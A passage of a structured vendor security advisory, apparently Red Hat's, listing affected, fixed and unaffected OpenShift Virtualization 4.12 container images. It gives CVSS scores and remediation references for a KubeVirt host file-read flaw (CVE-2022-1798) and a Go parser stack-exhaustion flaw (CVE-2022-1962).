"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2117872", }, ], notes: [ { category: "description", text: "An arbitrary file read vulnerability was found in the kubeVirt API. This flaw makes it possible to use the kubeVirt API to provide access to host files (like /etc/passwd, for example) in a KubeVirt VM as a disk device that can be written to and read from.", title: "Vulnerability description", }, { category: "summary", text: "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-1798", }, { category: "external", summary: "RHBZ#2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-1798", url: "https://www.cve.org/CVERecord?id=CVE-2022-1798", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", }, { category: "external", summary: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", url: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", }, ], release_date: "2022-08-08T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.7, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", }, { cve: "CVE-2022-1962", cwe: { id: "CWE-1325", name: "Improperly Controlled Sequential Memory Allocation", }, discovery_date: "2022-07-14T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2107376", }, ], notes: [ { category: "description", text: "A flaw was found in the golang standard library, go/parser. When calling any Parse functions on the Go source code, which contains deeply nested types or declarations, a panic can occur due to stack exhaustion. This issue allows an attacker to impact system availability.", title: "Vulnerability description", }, { category: "summary", text: "golang: go/parser: stack exhaustion in all Parse* functions", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", 